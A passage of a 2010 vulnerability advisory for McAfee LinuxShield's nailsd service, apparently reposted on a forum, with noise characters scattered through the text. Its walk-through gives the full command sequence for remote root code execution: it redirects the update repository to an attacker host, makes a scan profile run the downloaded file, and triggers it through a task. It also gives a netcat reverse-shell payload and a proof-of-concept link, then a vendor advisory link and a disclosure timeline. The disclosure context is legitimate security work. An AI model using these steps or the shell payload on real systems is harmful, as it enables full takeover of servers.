    & W4 O' ]. W$ N% q1 m  mexecute9 {& U# \; u7 f1 A; Y
    tasks with root privileges.
    9 {( {2 ~( y2 {2 b: l
    4 S, H2 V; p' I8 FA direct execution of commands is not possible, but it is possible to
    ( a( K7 X/ Y) Z# A# a6 J; M5 r+ ldownload and execute code through manipulation of the config and
      k6 H. C7 A3 R9 l* C" ~! Wexecute schedule tasks of the LinuxShield.
    / i! Z) ]8 }" Q* A6 j& t- {
    1 k. z8 h  @6 q9 M; ?, a* Y
    + I+ N8 S6 I7 b, \3 M# Dwalk-through (after the TLS handshake):
    ( O: y0 }/ {0 x/ j. w2 c( T+--------------------------------------
    7 c5 Z0 a% U8 ~" I5 F( [" _8 {6 Q$ a4 ]
    nailsd > +OK welcome to the NAILS Statistics Service
    3 E) u" K  S2 N& d$ ]- lattacker> auth <user> <pass>
    7 B8 ^) E& l0 A/ [nailsd > +OK successful authentication4 E% R) V+ F" s7 ]$ D
    9 O' {$ E7 r: k4 z3 D" Z
    # Set the Attacker repository to download our code from a httpd. m, Y$ r* c1 P( K! v0 K/ n
    # (catalog.z)
    5 y$ g1 X0 @9 o) g! {5 `1 }6 r#---------------------------------------------------------------1 W1 ]5 z+ M. P( N
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    4 f+ L6 [" h* m# @+ M/ b, u="1.0" encoding="UTF-8"?><ns:SiteLists
    9 M) v' G3 G% nxmlns:ns="naSiteLi/ g( u! V- p# i9 I1 Z" n% \- L: m
    st" GlobalVersion="20030131003110"4 M2 O9 H$ M: R! F$ c
    LocalVersion="20091209
    5 A, H& F  L: n3 X161903" Type="Client"><SiteList
    , v. r9 J, |3 e2 @) S  O5 jDefault="1" Name="SomeGU
    + `; a, O. t$ q/ |/ U* b7 F7 jID"><HttpSite Type="repository"
    9 @1 [% t+ m+ X* l) J, O8 ^Name="EvilRepo" Order="1
    ; N# B7 V  J1 P+ ?" b: G* k: W" n  C" Server="<attackerhost>:80"' b& c5 K$ {8 ]" X2 Z# m. @2 o
    Enabled="1" Local="1"><Rela: c3 R" j6 S& \/ N* }% O
    ; ]& L% l1 R' ^! M
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use7 z/ ~* y4 w7 S, T# s
    rName></
    ( B9 e! {! h0 ?% y& E4 B4 c/ QUserName><Password5 r7 C4 I) X3 f4 ]& K- H
    Encrypted="0"/></HttpSite></SiteList></
    / {% p% \- U; r$ Bns:SiteLists> _cmd=update5 g* t4 K: b$ |( @: h' t
    nailsd > +OK database changes buffered.4 R# X( X0 z1 N$ V+ ]% m7 h
    ' g. ], O7 G1 `% G
    # Execute task to set the attacker repository9 @# f- b, U/ X% B& J
    #---------------------------------------------------------------
    8 i; X- i! @5 `attacker> task setsitelist
    - A: M* k! Q& d0 _nailsd > +OK setting sitelist from CMA.
    # v5 y$ P; R+ i) |( i4 Y7 y* t2 c$ _1 J1 g9 i
    # Execute the default Update task to download the code4 C2 m8 F2 X% ^% u  |
    #---------------------------------------------------------------
    % u. M  E3 W$ Q* Nattacker> task nstart LinuxShield Update
    - ^' {1 n% H" [# r) S( Ynailsd > +OK task LinuxShield Update starting
    ( O% L$ P0 @% Y3 @
    / |. h+ _, t( k! E# Create a Scan profile, which executes our code. The profiles are
    / x5 b* r: r* H" J5 V& T1 E) `; o# not stored in the database.
    4 _- \% u! `1 D/ Q8 t) ]# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    # _3 |* ]5 X9 S4 b1 p' p7 Z#---------------------------------------------------------------
    # U/ @! T8 K0 Rattacker> sconf ODS_99 begin
    ' O# d, l$ i# Enailsd > +OK 1260400888
    + n: k* N( `& R- T2 ?9 _7 \/ c* t# B
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the+ J/ C* z1 j; n' P
    path! `8 E- ~0 p4 M* f
    # where our earlier downloaded catalog.z file is stored.
      `: J. L( P- B2 y3 D) t# (/opt/McAfee/cma/scratch/update/catalog.z)
    " v4 ~4 G3 _2 d; Y) V$ A#---------------------------------------------------------------' f) _8 O) P4 n: n& I+ K
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=7 z6 Y7 ]& K7 J$ T0 X( Z9 L' U
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    1 J! x' s8 V% _DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    " C4 p, _- d  L* ~10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng/ Z5 d" I. U7 s; O# i1 @) f& A
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    7 }! ^/ d2 ~( a' \2 R3 vfile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    - I; ?8 V+ i* S' q3 @" v4 A6 h) C$ Lir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    9 z/ b. h7 J* f$ i, HginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd* ^* W9 k5 ^7 q' g3 s  V$ z1 E! s
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu/ m+ C9 ]) P, j2 p: d0 f
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    % L& X% Z. B* p+ N, f2 ~e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    ; C8 ~' d" T9 q.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi% X# w7 t7 q$ w8 B! A, ^" u1 {5 [$ \
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil5 r# H7 b" o0 _( V; a. h
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    0 ^. W4 b" b# ^$ I  M# C9 L  S, Re nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    % |* P: J& V$ V+ H- L. `ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    * F: B' B6 W$ f8 R# Uo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    * ~( T7 M: E: H) M$ J+ E+ a2 j" ~.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    ; K0 t0 n* V. m" X& P( _rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat0 a: s0 L6 x5 A+ D+ n
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    7 v( i! z( V: i: o5 y/ R) L6 I00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.  d' b8 j* z9 W; M9 X4 R7 F
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil0 R- K. Q% F2 I9 E# @! Q9 ?, D, F0 R
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true! S) n& p: \+ z1 g  h! ^
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    0 l) z. j0 D# c1 e% A# e" ^ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    ) v0 I# y4 `% ?8 Q( Ce.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_996 g0 A% ]+ B3 @! j
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.$ |/ N  u+ L* k  n8 B6 ~; t7 k
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    ) i/ d. `/ T5 Q% s0 T8 d, h0 V2 U) Jecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    8 y( P0 c: d* Y" ass nailsd.profile.ODS_99.action.error=Block  q0 I& C3 }5 {, T2 ?, W0 M
    nailsd > +OK configuration changes buffered
    4 J2 U- {1 A: r3 y# y6 Aattacker> sconf ODS_99 commit 1260400888) d9 N/ E! `/ G, u
    nailsd > +OK configuration changes stored
    2 `( v: d( K! e2 A2 w: o( X- b" c5 l8 P6 ], t; k
    # Set a scan task with the manipulated profile to execute the code4 z7 f% Y' t1 T3 j$ q
    #---------------------------------------------------------------
    8 a; F+ f3 W$ }attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy5 O4 o1 Q, ?' J2 b+ u" D3 R
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t" t/ b5 L2 F/ K
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    % R" ?' p4 S0 @+ {_lastRun=1260318482 status=Stopped _cmd=insert
    * |1 |( h! l" A5 T( pnailsd > +OK database changes buffered
      U6 P) j9 ]! ^) A
    6 z; ?# @, P) n6 t% r: _/ h# Execute scan task to execute the code0 [3 @& R, X- W: R
    #---------------------------------------------------------------
    , I# X4 l  j6 F( ~! w, aattacker> task nstart Evil Task* ^6 i. d4 K: p4 c* d+ ^" [+ J

    % q$ A- f5 R& A3 Y+-------------------------------------- walk-through EOF
    2 d- o& \/ e$ Z, Y, |9 ]; x1 y4 m# s8 M
    ( d' l, y+ o. N( @' c6 `$ ^
    To get a reverse root shell place something like this in the catalog.z
    * r- K0 @3 g5 t  F* z7 U2 a! H- {+ M) r" }
    --- snip ---) E8 I+ J/ }7 l
    #!/bin/sh5 Z. i% I# N$ u! w
    nc -nv <attacker_host> 4444 -e /bin/sh2 P6 y& Z( T% e" Y
    --- /snip ---
    2 g7 O6 Z; z( M3 b1 S
    $ Z* q. J+ b# V: g! f# F
    1 M4 L+ N& I( f$ v4 |( }0 |4 V; ~2 k. F  _+ U; g2 O2 i& M
    Proof of Concept :1 I9 \! B" A- @; U1 s
    ==================
    9 |* l+ ?% A# n3 N9 Y8 |+ Q+ V6 d. x7 p6 u" b$ L
    http://inj3ct0r.com/sploits/11165.tar.gz0 U7 A; n. X; v3 `& u. N

    0 G( r: K0 m! ]" p* K, t- J% G

    ! [2 H( Z# A1 M* E. u6 P; f8 ySolution:
    2 C5 d) |+ U2 d=========, x2 g  l* W4 p! O

    . q/ `, b# m/ _, XMcAfee Advisory
    9 }6 ]' Z0 ]* D+--------------* G; l) M# _  g* z
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    2 m( y: z& r$ e4 c0 I+ r" Q/ [* v6 h% B5 l3 J

    ' B" B$ z5 t# q1 P3 R7 L5 m5 ~% z* u  A* j# M7 G
    Disclosure Timeline (YYYY/MM/DD):& p  @! |2 Z5 P* N: n' D3 {  w+ U
    =================================* U+ w4 Q8 T+ D, j1 `* q5 J! S

    3 L, b. ^% O# B, [0 [2009.12.07: Vulnerability found) v! H' O4 i( k) G8 k5 P
    2010.02.03: Asked vendor for a PGP key
    ( c2 `9 U% V" U. C* X2010.02.05: Vendor sent his PGP key5 G6 j1 y6 i0 `, ^' q! s6 b3 f+ i
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure" `, ~5 ^! [4 X) Q
    date (2010.02.18) to Vendor
    4 ?* {2 F- w1 x  e, k' Q4 h# z2010.02.05: Vendor acknowledges the reception of the advisory
    6 M* h4 ?$ c# K3 C2010.02.16: Ask for a status update, because the planned release date is+ i8 |& O/ f; s5 t. a% v. U. \/ D
    2010.02.18.1 \' _9 e& T4 R( M3 ^! i
    2010.02.16: Vendor response that, they are currently working on a patch
    1 t6 _( H5 I, c2010.02.17: Changed release date to 2010.02.25.
    ' e' z" j: S8 Y2010.02.22: Vendor gives a status update, that they are able to release; ]8 A' N* m3 L% P
    the patch on 2010.02.25.
    3 x6 s) ^3 Y7 d4 g5 D' `4 o  j7 N2010.02.24: Ask for a list of affected products and the advisory url.* T! |! O, b5 C
    2010.02.24: Vendor sends the list.
    3 f9 e# g5 Y% U9 V2010.03.02: Release of this Advisory8 F# L/ e$ ?, j* g2 x4 {. J
    1 W) v  |$ M& J' K' ^8 M: f1 {
    & e7 h1 A2 V- v

    ' Z/ S3 {9 G5 T# ~% p+ C3 ~) V
    7 G8 w) T8 Z) N+ a5 a$ ?9 ?/ [. ]
    ! }8 L- s, K: J& O* D4 Q
    ! `* T% @, E5 U7 V' ~6 o% e( I: J" K7 B
    & S0 G, r3 o$ J: B) r* F5 z
    0 `$ W8 `% t) k1 w6 z& N! M/ W& }  K, x1 a. x* s# e

    2 S/ R! _) i* m* g, e& K" j; j" ?/ Y, p( N
    ; H7 B+ \  Q# A1 G
      R( g- U. o5 ]$ {+ A

    . n8 i9 e1 K& V9 D8 e! u7 z4 X- D& _) o# g# m' }

    6 m7 a7 M2 ^+ Q5 q$ {- C
    4 Z  f6 Q' f6 Z* d! e2 r# J* I8 @9 D* H. \5 n2 j

    1 p% E# f& z- O" e+ H* q
    $ j- x. P# ?2 e5 F/ v$ }% X3 I' @, q
    5 n& }; @8 e3 L; S+ J$ \: `公告:https://www.sitedirsec.com公布最新漏洞,请关注




    欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://www.sitedirsec.com/) Powered by Discuz! 7.2